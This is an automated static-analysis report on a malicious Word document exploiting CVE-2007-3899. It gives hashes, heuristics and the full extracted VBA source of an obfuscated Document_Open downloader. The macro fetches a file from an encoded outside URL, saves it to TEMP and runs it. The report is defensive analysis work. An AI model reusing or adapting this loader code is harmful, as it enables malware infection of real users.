Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5cece0cb0a76719…

MALICIOUS

Office (OLE)

Size: 358.0 KB | Created: 2020-03-29 20:40:00 | Authoring application: Microsoft Office Word | First seen: 2020-09-24
MD5: 1324300edad18e5acaa84bdd33d9d1c7 SHA-1: 8fc3a2ad8a8f4e801442b298da5757f9f7ac0b91 SHA-256: c5cece0cb0a76719cdb598f3e77fef93f543df527c0390cddff42b4d125426e8
Risk Score: 278

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution; T1059.005 Visual Basic

The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, to trigger an obfuscated VBA loader. The loader's Document_Open macro uses CreateObject and the CreateProcessA API to run a payload; its primary intent is to download and execute a second-stage payload through CreateProcess.

Heuristics (9)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical, CVE likely] CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Public Function DDFunc() As Object
        Set DDFunc = CreateObject(SDBqNUFDsp4xUjmKJPAeYJXya8("udfkcPnfutzTfmjG/hojuqjsdT"))
    End Function
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function DDFunc() As Object
        Set DDFunc = CreateObject(SDBqNUFDsp4xUjmKJPAeYJXya8("udfkcPnfutzTfmjG/hojuqjsdT"))
    End Function
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
        Module2.jARVE2CUb839wrpzUb9Hxs3Tv9
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Public Function RKZEOFgxO27LTSo2HtVCqMUU0z() As String
     RKZEOFgxO27LTSo2HtVCqMUU0z = Environ(SDBqNUFDsp4xUjmKJPAeYJXya8("QNFU")) & Application.PathSeparator & SDBqNUFDsp4xUjmKJPAeYJXya8("mme/e")
    End Function
  • Reference to CreateProcess API [high] SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 7231 bytes
SHA-256: 307829b15065d25c781368330115e78a210c71553a19930ba248a906bb45c4e5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Module2.jARVE2CUb839wrpzUb9Hxs3Tv9
End Sub

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Integer
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

#If VBA7 Then
Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" ( _
    ByVal lpAppName As String, _
    ByVal lpCmdLine As String, _
    ByVal lpProcAttr As Long, _
    ByVal lpThreadAttr As Long, _
    ByVal lpInheritedHandle As LongPtr, _
    ByVal lpCreationFlags As LongPtr, _
    ByVal lpEnv As Long, _
    ByVal lpCurDir As String, _
    lpStartupInfo As STARTUPINFO, _
    lpProcessInfo As PROCESS_INFORMATION) As LongPtr
Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal vwe3 As Long) As Long
#Else
Private Declare Function CreateProcessA Lib "Kernel32" ( _
    ByVal lpAppName As String, _
    ByVal lpCmdLine As String, _
    ByVal lpProcAttr As Long, _
    ByVal lpThreadAttr As Long, _
    ByVal lpInheritedHandle As Long, _
    ByVal lpCreationFlags As Long, _
    ByVal lpEnv As Long, _
    ByVal lpCurDir As String, _
    lpStartupInfo As STARTUPINFO, _
    lpProcessInfo As PROCESS_INFORMATION) As Long
Private Declare Function Sleep Lib "Kernel32" (ByVal vwe3 As Long) As Long
#End If



Private Sub DUDU()
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
Dim si2 As STARTUPINFO
Dim pi2 As PROCESS_INFORMATION
Dim temp As String: temp = SDBqNUFDsp4xUjmKJPAeYJXya8("fyf/34swthfs]34nfutzT]txpeojX];D")
Dim temp2 As String: temp2 = SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D")
Dim url As String: url = SDBqNUFDsp4xUjmKJPAeYJXya8("fyf/uqjsdtd]34nfutzT]txpeojX];D")
Dim durl As String: durl = SDBqNUFDsp4xUjmKJPAeYJXya8("!phpmpo0!") + SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D")
Dim file As String: Dim i As Integer: i = 0
    If CreateProcessA(url, durl, 0, 0, False, 0, 0, "C:\", si, pi) Then
        Do While file = "" Or i > 10
            file = RKZEOFgxO27LTSo2HtVCqMUU0z()
            Sleep 3000: i = i + 1
        Loop
        Deleter
        If CreateProcessA(temp, SDBqNUFDsp4xUjmKJPAeYJXya8("!jt0!") + RKZEOFgxO27LTSo2HtVCqMUU0z(), 0, 0, False, 0, 0, "C:\", si2, pi2) Then
            Debug.Print 1
        Else
            Debug.Print 2
        End If
    End If
End Sub

Public Sub jARVE2CUb839wrpzUb9Hxs3Tv9()
    CREATEFILEFUNC
    DUDU
End Sub

Private Function CREATEFILEFUNC()
Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As Object: Set Ak0UIU4QaEDoyiH7CWxPySc4jM = DDFunc
Dim a As Object
Dim d1 As String: d1 = SDBqNUFDsp4xUjmKJPAeYJXya8("*#2/6/utfvrfSquuIojX/quuIojX#)udfkcPfubfsD!>!rfSquuIojX!ufT!*)ojbN!cvT")
Dim d2 As String: d2 = SDBqNUFDsp4xUjmKJPAeYJXya8("eoft/rfSquuIojX!;!ftmbG-#unK4{1ZDfBSQdHg07FZUY[cxCtmLvPBH109::9775:620pqnbd0cvmd/ldpsjcpcjc00;quui#-#UFH#!ofqP/rfSquuIojX")
Dim d3 As String: d3 = SDBqNUFDsp4xUjmKJPAeYJXya8("ofiU!113!>!tvubuT/rfSquuIojX!gJ")
Dim d4 As String: d4 = SDBqNUFDsp4xUjmKJPAeYJXya8("*#nbfsuT/CEPEB#)udfkcPfubfsD!>!nbfsuTp!ufT")
Dim d5 As String: d5 = SDBqNUFDsp4xUjmKJPAeYJXya8("#!>!iubq!;!zepCftopqtfs/rfSquuIojX!fujsX/nbfsuTp!;!2!>!fqzU/nbfsuTp!;ofqP/nbfsuTp") + RKZEOFgxO27LTSo2HtVCqMUU0z() + SDBqNUFDsp4xUjmKJPAeYJXya8("ftpmD/nbfsuTp!;!3!-iubq!fmjGpUfwbT/nbfsuTp!;#")
Dim d8 As String: d8 = SDBqNUFDsp4xUjmKJPAeYJXya8("ojbN!mmbD!;cvT!eoF!gJ!eoF")
    
    Set up9FDJnVkQNF953nOSajSMPtvo = ff(Ak0UIU4QaEDoyiH7CWxPySc4jM)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d1)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d2)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d3)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d4)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d5)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d6)
    up9FDJnVkQNF953nOSajSMPtvo.WriteLine (d8)

    up9FDJnVkQNF953nOSajSMPtvo.Close
End Function

Public Function DDFunc() As Object
    Set DDFunc = CreateObject(SDBqNUFDsp4xUjmKJPAeYJXya8("udfkcPnfutzTfmjG/hojuqjsdT"))
End Function

Public Function ff(d As Object) As Object
Dim Exists As String
    Exists = Dir(SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D"), vbDirectory)
    If Exists = "" Then
        d.CreateFolder SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D")
    End If
    Set ff = d.CreateTextFile(SDBqNUFDsp4xUjmKJPAeYJXya8("tcw/e]zspudfsjeqnu]djmcvQ]tsftV];D"), True)
End Function

Private Function Deleter()
Dim ff As Object: Set ff = DDFunc
Dim Exists As String
    Exists = Dir(SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D"), vbDirectory)
    If Not Exists = "" Then
        ff.DeleteFolder SDBqNUFDsp4xUjmKJPAeYJXya8("zspudfsjeqnu]djmcvQ]tsftV];D")
    End If
End Function

Public Function RKZEOFgxO27LTSo2HtVCqMUU0z() As String
 RKZEOFgxO27LTSo2HtVCqMUU0z = Environ(SDBqNUFDsp4xUjmKJPAeYJXya8("QNFU")) & Application.PathSeparator & SDBqNUFDsp4xUjmKJPAeYJXya8("mme/e")
End Function

Function SDBqNUFDsp4xUjmKJPAeYJXya8(SFjRThkvu17fvkRaVtPfJItdaP As String) As String
    SDBqNUFDsp4xUjmKJPAeYJXya8 = rWbrqMQOQWAEzzk5VKXlkXZIjY(dtDn0FNZNcwipmFPk87UYwZfDE(SFjRThkvu17fvkRaVtPfJItdaP, Len(SFjRThkvu17fvkRaVtPfJItdaP), 1), Len(SFjRThkvu17fvkRaVtPfJItdaP), 1)
End Function

Public Function dtDn0FNZNcwipmFPk87UYwZfDE(SFjRThkvu17fvkRaVtPfJItdaP As String, gce66SISWKp8CceEEt7zYxTJCp As Long, TEOrWG1EZIQy4oXdOGvWqxAFEA As Long) As String
    Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As String
    Ak0UIU4QaEDoyiH7CWxPySc4jM = SFjRThkvu17fvkRaVtPfJItdaP
    For up9FDJnVkQNF953nOSajSMPtvo = 1 To gce66SISWKp8CceEEt7zYxTJCp
       Mid$(Ak0UIU4QaEDoyiH7CWxPySc4jM, up9FDJnVkQNF953nOSajSMPtvo, 1) = Mid$(SFjRThkvu17fvkRaVtPfJItdaP, gce66SISWKp8CceEEt7zYxTJCp - up9FDJnVkQNF953nOSajSMPtvo + TEOrWG1EZIQy4oXdOGvWqxAFEA, 1)
    Next
    dtDn0FNZNcwipmFPk87UYwZfDE = Ak0UIU4QaEDoyiH7CWxPySc4jM
End Function

Public Function rWbrqMQOQWAEzzk5VKXlkXZIjY(SFjRThkvu17fvkRaVtPfJItdaP As String, gce66SISWKp8CceEEt7zYxTJCp As Long, TEOrWG1EZIQy4oXdOGvWqxAFEA As Long) As String
    Dim Ak0UIU4QaEDoyiH7CWxPySc4jM As String
    For up9FDJnVkQNF953nOSajSMPtvo = 1 To gce66SISWKp8CceEEt7zYxTJCp
        Ak0UIU4QaEDoyiH7CWxPySc4jM = Chr(Asc(Mid$(SFjRThkvu17fvkRaVtPfJItdaP, up9FDJnVkQNF953nOSajSMPtvo, 1)) - TEOrWG1EZIQy4oXdOGvWqxAFEA)
        Mid$(SFjRThkvu17fvkRaVtPfJItdaP, up9FDJnVkQNF953nOSajSMPtvo, 1) = Ak0UIU4QaEDoyiH7CWxPySc4jM
    Next
    rWbrqMQOQWAEzzk5VKXlkXZIjY = SFjRThkvu17fvkRaVtPfJItdaP
End Function